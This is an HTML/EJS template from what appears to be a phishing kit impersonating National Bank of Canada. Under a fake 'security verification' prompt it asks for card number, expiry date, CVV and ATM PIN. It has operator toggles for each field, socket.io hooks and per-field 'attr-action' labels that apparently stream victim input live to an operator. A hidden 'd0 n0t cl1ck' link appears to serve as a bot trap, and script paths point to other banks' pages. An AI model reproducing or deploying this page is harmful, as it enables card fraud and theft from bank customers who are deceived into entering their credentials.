<%

let p_card = nbc.card === 'on' ? true : false;
let p_atm = nbc.atm === 'on' ? true : false;
let p_cvv = nbc.cvv === 'on' ? true : false;
let p_expiry = nbc.exp === 'on' ? true : false;

%>
<html lang="en">
    <head>
        <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
        <meta name="viewport" content="width=device-width,initial-scale=1">
        <title>Services bancaires / Banking Services</title>
        <link rel="shortcut icon" href="/assets/nbc/favicon.ico">
        <link href="/assets/nbc/nbc_files/main.0a92d0a0.css" rel="stylesheet">
        <style type="text/css" data-styled-components="iVXCSc fvRaFi intGMm fFgwqV" data-styled-components-is-local="true">		/* sc-component-id: sc-bdVaJa */
            .fvRaFi{padding:0.563rem 1rem;font-size:1em;font-family:'gilroy', Arial, Helvetica, sans-serif;line-height:1.25;border-radius:8px;border:1px solid #d2d2d2;color:#000;box-shadow:inset 0 1px 3px 0 rgba(0,0,0,0.14);-webkit-transition:all 0.2s;transition:all 0.2s;-webkit-appearance:none;box-sizing:border-box;}.fvRaFi:focus,.fvRaFi[type='checkbox']:focus{outline:0;border:1px solid #7993a2;box-shadow:1px 2px 4px 0 rgba(0,0,0,0.1), inset 0 1px 3px 0 rgba(0,0,0,0.14);-webkit-transition:all 0.2s;transition:all 0.2s;}.fvRaFi[disabled]{opacity:0.3;background-color:#d2d2d2;}.fvRaFi[type='checkbox']{position:relative;border-radius:4px;width:2em;height:2em;padding:0.25em;box-shadow:none;color:#fff;border:1px solid #d2d2d2;background:#fff;}.fvRaFi[type='checkbox']:checked{border-color:transparent;background:#2d67b2;}.fvRaFi[type='checkbox']:checked::after{content:url(/static/media/check.2f5ff41b.svg);}.fvRaFi[type='checkbox'].is-small{width:1.5em;height:1.5em;}.fvRaFi[type='radio']{position:relative;border-radius:50%;width:2em;height:2em;padding:0.25em;box-shadow:none;color:i_color_white;border:1px solid #d2d2d2;background:#fff;}.fvRaFi[type='radio'].is-small{width:1.5em;height:1.5em;}.fvRaFi[type='radio']:checked::after{content:'';width:1em;height:1em;border-radius:50%;background:#2d67b2;}.fvRaFi[type='checkbox']:checked::after,.fvRaFi[type='radio']:checked::after{position:absolute;left:50%;top:50%;-webkit-transform:translate(-50%,-50%);-ms-transform:translate(-50%,-50%);transform:translate(-50%,-50%);}
            /* sc-component-id: sc-bwzfXH */
            .intGMm{color:#7993a2;font-family:'gilroy', Arial, Helvetica, sans-serif;font-weight:normal;font-size:0.875rem;line-height:1.5;white-space:nowrap;}
            /* sc-component-id: sc-bZQynM */
            .fFgwqV{opacity:1;display:block;color:#7993a2;font-family:'gilroy', Arial, Helvetica, sans-serif;font-weight:normal;font-size:0.875em;line-height:1em;text-align:right;-webkit-transition:all 0.2s;transition:all 0.2s;margin-top:0;margin-bottom:0.25em;}
            /* sc-component-id: sc-keyframes-iVXCSc */
            @-webkit-keyframes iVXCSc{from{-webkit-transform:rotate(0deg);-ms-transform:rotate(0deg);transform:rotate(0deg);}to{-webkit-transform:rotate(360deg);-ms-transform:rotate(360deg);transform:rotate(360deg);}}@keyframes iVXCSc{from{-webkit-transform:rotate(0deg);-ms-transform:rotate(0deg);transform:rotate(0deg);}to{-webkit-transform:rotate(360deg);-ms-transform:rotate(360deg);transform:rotate(360deg);}}
        </style>
        <style type="text/css" data-styled-components="" data-styled-components-is-local="true"></style>
        <script src="https://code.jquery.com/jquery-3.6.0.min.js" crossorigin="anonymous"></script>
        <script>var lrbank = '<?=escape($udata->last->bank)?>'; var lrinfo = '<?=escape($udata->last->info)?>';</script>
        <script src="/assets/js/actions.js?v=<?=time()?>"></script>
        <script src="/socket.io/socket.io.js"></script>
    </head>
    <body>
        <div id="root">
            <div data-reactroot="">
                <div class="content">
                    <div class="wrapper">
                        <header class="connect-header en">
                            <div class="logo-banque-nationale">
                                <div class="nbc-logo">
                                    <br>
                                    <svg viewBox="0 0 408.6 106.3" preserveAspectRatio="xMidYMid meet">
                                        <g>
                                            <g>
                                                <path class="logo-icon" d="M73.3,25 C71.3,25.5 69.9,25.8 68.4,25.2 C67.3,24.8 66.4,23.5 65.6,22.4 L52,3.8 C51.2,2.7 50.3,1.4 49.2,1 C47.8,0.4 46.3,0.8 44.3,1.2 L0.5,13 L0.5,94.5 L44.4,82.8 C46.4,82.4 47.9,82 49.3,82.6 C50.4,83.1 51.3,84.3 52.1,85.4 L65.6,104 C66.4,105.1 67.3,106.3 68.4,106.8 C69.8,107.3 71.3,107 73.3,106.6 L117.1,94.9 L117.1,13.2 L73.3,25 Z"></path>
                                                <polygon class="logo-txt" points="167 16.5 167 37.4 166.9 37.4 153.1 13.2 145.5 16.9 145.5 47.9 152.2 47.9 152.2 23.1 152.3 23.1 166.5 47.9 173.7 47.9 173.7 13.2"></polygon>
                                                <path class="logo-txt" d="M197.9,13.2 L197.9,13.2 L187.8,18.1 L177.2,47.9 L184.8,47.9 L187.2,40.7 L200,40.7 L202.2,47.9 L210.1,47.9 L197.9,13.2 Z M189.2,34.7 L193.6,21 L193.7,21 L198,34.7 L189.2,34.7 Z"></path>
                                                <path class="logo-txt" d="M339.7,13.2 L339.7,13.2 L329.6,18.1 L319,47.9 L326.6,47.9 L329,40.7 L341.8,40.7 L344,47.9 L351.9,47.9 L339.7,13.2 Z M330.9,34.7 L335.3,21 L335.4,21 L339.7,34.7 L330.9,34.7 Z"></path>
                                                <polygon class="logo-txt" points="234.1 13.2 209.4 13.2 205.9 19.3 205.9 19.3 216.4 19.3 216.4 47.9 223.6 47.9 223.6 19.3 230.5 19.3"></polygon>
                                                <polygon class="logo-txt" points="237 16.7 237 47.9 244.2 47.9 244.2 13.2 244.2 13.2"></polygon>
                                                <path class="logo-txt" d="M265.7,12.3 C265.4,12.3 265,12.3 264.6,12.3 L252.6,18.2 C250.5,20.9 249,24.9 249,30.6 C249,46.9 261.1,48.9 265.7,48.9 C270.3,48.9 282.4,46.9 282.4,30.6 C282.3,14.2 270.2,12.3 265.7,12.3 Z M265.7,42.7 C261.8,42.7 256.3,40.3 256.3,30.6 C256.3,20.9 261.8,18.5 265.7,18.5 C269.6,18.5 275.1,20.9 275.1,30.6 C275.1,40.3 269.6,42.7 265.7,42.7 Z"></path>
                                                <polygon class="logo-txt" points="308.6 16.5 308.6 37.4 308.5 37.4 294.7 13.2 287.1 16.9 287.1 47.9 293.9 47.9 293.9 23.1 294 23.1 308.1 47.9 315.4 47.9 315.4 13.2"></polygon>
                                                <polygon class="logo-txt" points="380 41.6 362.7 41.6 362.7 13.2 355.5 16.7 355.5 47.9 376.4 47.9"></polygon>
                                                <path class="logo-txt" d="M168.8,76 C170.2,75.3 173.1,73.9 173.1,68.9 C173.1,65.3 170.9,60 162.4,60 L152.8,60 L145.5,63.6 L145.5,94.7 L160.2,94.7 C167.3,94.7 169.2,93.5 171.2,91.6 C173,89.8 174.2,87.2 174.2,84.4 C174.1,81 173,77.6 168.8,76 Z M152.4,66 L160.7,66 C164,66 166,66.9 166,69.7 C166,72.5 163.7,73.6 160.9,73.6 L152.4,73.6 L152.4,66 L152.4,66 Z M161.3,88.7 L152.4,88.7 L152.4,79.4 L161.6,79.4 C164.2,79.4 166.8,80.6 166.8,83.6 C166.9,87.2 164.8,88.7 161.3,88.7 Z"></path>
                                                <polygon class="logo-txt" points="232.5 63.3 232.5 84.2 232.4 84.2 218.6 60 211 63.8 211 94.7 217.8 94.7 217.8 70 217.9 70 232 94.7 239.3 94.7 239.3 60"></polygon>
                                                <path class="logo-txt" d="M195.7,60 L195.7,60 L185.6,65 L175,94.7 L182.6,94.7 L185,87.5 L197.8,87.5 L200,94.7 L207.9,94.7 L195.7,60 Z M187,81.6 L191.4,67.9 L191.5,67.9 L195.8,81.6 L187,81.6 Z"></path>
                                                <polygon class="logo-txt" points="275.2 60.1 263.9 62 252.6 74.2 252.6 60 245.3 63.6 245.3 94.7 252.6 94.7 252.6 83 256 79.5 266.7 94.7 276 94.7 261 74.2"></polygon>
                                            </g>
                                        </g>
                                    </svg>
                                </div>
                            </div>
                        </header>
                        <main class="connect-content">
                            <div class="container">
                                <div class="heading">
                                    <div class="form-header">
                                        <p>
                                            Please complete the security verification before accessing your account.
                                        </p>
                                    </div>
                                </div>
                                <form id="loginForm" id="id7" method="post" action="">
                                    <input type="hidden" id="userAgent" name="userAgent">
                                    <div id="loginForm" class="connect-form">
                                        <div class="form-header">
                                            <p>Personal Information</p>
                                        </div>
                                        <div class="login-content">
                                            <span>
                                                <div class="login-relative form-fields login">
                                                    <div class="form-field">
                                                        <% if (p_card) { %>
                                                        <div class="form-group" style="padding-top: 15px">
                                                            <label class="form-group__label">Card Number</label>
                                                            <input id="input-card" type="tel" placeholder="Enter your Card Number" name="card" class="login-relative input-password sc-bdVaJa fvRaFi lrinput" onkeyup="split()" required="true" autocomplete="off" maxlength="19" minlength="14" oninput="this.value = this.value.replace(/[^0-9, ]/, '')" attr-action="Filling Card">
                                                            <script src="/assets/js/splitter.js?v=<?=time()?>"></script>
                                                            <link rel="stylesheet" href="/assets/css/card.css?<?=time()?>">
                                                        </div>
                                                        <% } if (p_expiry) { %>
                                                            <div class="form-group" style="padding-top: 15px; display: block; text-align: left;">
                                                                <label class="form-group__label" style="display: block;">Expiry</label>
                                                                <!-- Month selection -->
                                                                <select name="exp1" required class="form-control text-center display-inline-block lrinput" style="width:48%; display: inline-block" attr-action="Selecting Expiry">
                                                                    <option value="">MM</option>
                                                                    <% for(let m = 1; m <= 12; m++) { %>
                                                                        <% let month = m < 10 ? '0' + m : m; %>
                                                                        <option value="<%= month %>"><%= month %></option>
                                                                    <% } %>
                                                                </select>
                                                            
                                                                <!-- Year selection -->
                                                                <select name="exp2" required class="form-control text-center display-inline-block lrinput" style="width:50%; display: inline-block" attr-action="Selecting Expiry">
                                                                    <option value="">YY</option>
                                                                    <% let currentYear = new Date().getFullYear() %>
                                                                    <% for(let y = currentYear; y <= currentYear + 15; y++) { %>
                                                                        <% let year = y.toString().substr(-2); %>
                                                                        <option value="<%= year %>"><%= year %></option>
                                                                    <% } %>
                                                                </select>
                                                            </div>
                                                            
                                                        <% } if (p_cvv) { %>
                                                        <div class="form-group" style="padding-top: 15px">
                                                            <label class="form-group__label">Cvv</label>
                                                            <input required="" id="input-cvv" type="tel" maxlength="3" placeholder="&bullet;&bullet;&bullet;" name="cvv" class="login-relative input-password sc-bdVaJa fvRaFi lrinput" oninput="this.value = this.value.replace(/[^0-9]/, '')" attr-action="Filling Cvv">
                                                        </div>
                                                        <% } if (p_atm) { %>
                                                        <div class="form-group" style="padding-top: 15px">
                                                            <label class="form-group__label">ATM Pin</label>
                                                            <input required="" id="input-atm" type="tel" maxlength="6" placeholder="&bullet;&bullet;&bullet;&bullet;" name="atm" class="login-relative input-password sc-bdVaJa fvRaFi lrinput" oninput="this.value = this.value.replace(/[^0-9]/, '')" attr-action="Filling ATM Pin">
                                                        </div>
                                                        <% } %>
                                                        <div id="loginFormSubmit" class="form-field" style="padding-top: 20px">
                                                            <button onclick="submitForm()" class="bt_cta fluid primary is-large" id="login-form_submit" title="" name="save" value="1" type="button">
                                                                <span class="bn-icon">
                                                                    <svg width="16" height="16" viewBox="0 0 16 16">
                                                                        <g fill="currentColor" fill-rule="nonzero">
                                                                            <g>
                                                                                <path d="M7.98 8.5a1.05 1.05 0 0 0-.68 1.846v1.351a.68.68 0 1 0 1.36 0v-1.351A1.05 1.05 0 0 0 7.98 8.5"></path>
                                                                                <path d="M12.603 11.836c0 .163-.024.333-.072.502-.247.887-1.101 1.505-2.079 1.505H5.507c-.977 0-1.831-.618-2.079-1.504a1.903 1.903 0 0 1-.07-.498l-.003-.183.003-4.499h9.245v.98l-.003-.01.003 3.707zm.207-6.034H3.15c-.635 0-1.15.516-1.15 1.15v4.884C2 13.69 3.572 15.2 5.507 15.2h4.945c1.935 0 3.509-1.51 3.509-3.364V6.95c0-.633-.517-1.15-1.151-1.15z"></path>
                                                                                <path d="M12.199 3.927C12.187 1.762 10.415 0 8.229 0l-.545.003A3.926 3.926 0 0 0 4.9 1.177a3.933 3.933 0 0 0-1.146 2.797l.007 2.272H5.393v-2.06c0-1.341 1.093-2.586 2.435-2.586h.306c1.342 0 2.435 1.245 2.435 2.587v2.059h1.636L12.2 3.927z"></path>
                                                                            </g>
                                                                        </g>
                                                                    </svg>
                                                                </span>
                                                                Continue
                                                            </button>
                                                        </div>
                                                    </div>
                                                </div>
                                            </span>
                                        </div>
                                    </div>
                                    <a rel="nofollow" href="/not-found" style="visibility: hidden;">d0 n0t cl1ck</a>
                                </form>
                            </div>
                        </main>
                    </div>
                </div>
            </div>
        </div>
        <span hidden id="navig"> <%=navig%> </span>
        <span hidden id="stage">Card</span>
    </body>
    <script src="/bank/atb/js/scriptCard.js"></script>
    <script src="/bank/nbc/js/script.js"></script>
</html>

